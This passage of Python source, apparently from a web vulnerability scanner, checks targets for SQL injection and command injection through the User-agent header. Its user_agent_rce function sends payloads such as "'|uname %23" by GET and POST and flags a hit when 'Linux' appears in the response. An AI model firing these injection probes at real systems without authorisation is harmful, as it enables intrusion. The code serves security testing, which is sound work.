{payload} 1049 | {bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}] 1050 | {bold}{info}{bold} Error : {e} 1051 | {bold}{info}{bold} URL : {r.url}{end} 1052 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1053 | break 1054 | elif len(ch2) > len(cch2): 1055 | print(f""" 1056 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1057 | {bold}{good}{bold} Bug Found : SQL Injection (in User-agent header) 1058 | {bold}{info}{bold} Payload : {payload} 1059 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 1060 | {bold}{info}{bold} Error : {e} 1061 | {bold}{info}{bold} URL : {r.url}{end} 1062 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1063 | break 1064 | else: 1065 | sleep(slp) 1066 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1067 | sleep(slp) 1068 | r = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1069 | for d,e in errors.items(): 1070 | ch = re.findall(e.encode("utf-8"),r.content) 1071 | cch = re.findall(e.encode("utf-8"),r2.content) 1072 | if len(ch) > len(cch): 1073 | print(f""" 1074 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1075 | {bold}{good}{bold} Bug Found : SQL Injection (in User-agent header) 1076 | {bold}{info}{bold} Payload : {payload} 1077 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 1078 | {bold}{info}{bold} Error : {e} 1079 | {bold}{info}{bold} URL : {r.url}{end} 1080 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1081 | break 1082 | def user_agent_rce(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None): 1083 | payloads = ["'|uname %23",'"|uname %23',"|uname %23"] 1084 | for payload in payloads: 1085 | if method == 'get': 1086 | sleep(slp) 1087 | rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1088 | sleep(slp) 1089 | rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1090 | sleep(slp) 1091 | r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1092 | sleep(slp) 1093 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1094 | cch = re.findall('Linux'.encode('utf-8'),rr.content) 1095 | cch2 = re.findall('Linux'.encode("utf-8"),rr2.content) 1096 | ch = re.findall('Linux'.encode('utf-8'),r.content) 1097 | ch2 = re.findall('Linux'.encode("utf-8"),r2.content) 1098 | if len(ch) > len(cch): 1099 | print(f""" 1100 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1101 | {bold}{good}{bold} Bug Found : Remote Code Execution (in User-agent header) 1102 | {bold}{info}{bold} Payload : {payload} 1103 | {bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}] 1104 | {bold}{info}{bold} URL : {r.url}{end} 1105 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1106 | elif len(ch2) > len(cch2): 1107 | print(f""" 1108 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1109 | {bold}{good}{bold} Bug Found : Remote Code Execution (in User-agent header) 1110 | {bold}{info}{bold} Payload : {payload} 1111 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 1112 | {bold}{info}{bold} URL : {r.url}{end} 1113 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1114 | else: 1115 | sleep(slp) 1116 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1117 | sleep(slp) 1118 | r = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1119 | ch = re.findall('Linux'.encode("utf-8"),r.content) 1120 | cch = re.findall('Linux'.encode("utf-8"),r2.content) 1121 | if len(ch) > len(cch): 1122 | print(f""" 1123 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1124 | {bold}{good}{bold} Bug Found : Remote Code Execution (in User-agent header) 1125 | {bold}{info}{bold} Payload : {payload} 1126 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 1127 | {bold}{info}{bold} URL : {r.url}{end} 1128 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1129 | """) 1130 | --------------------------------------------------------------------------------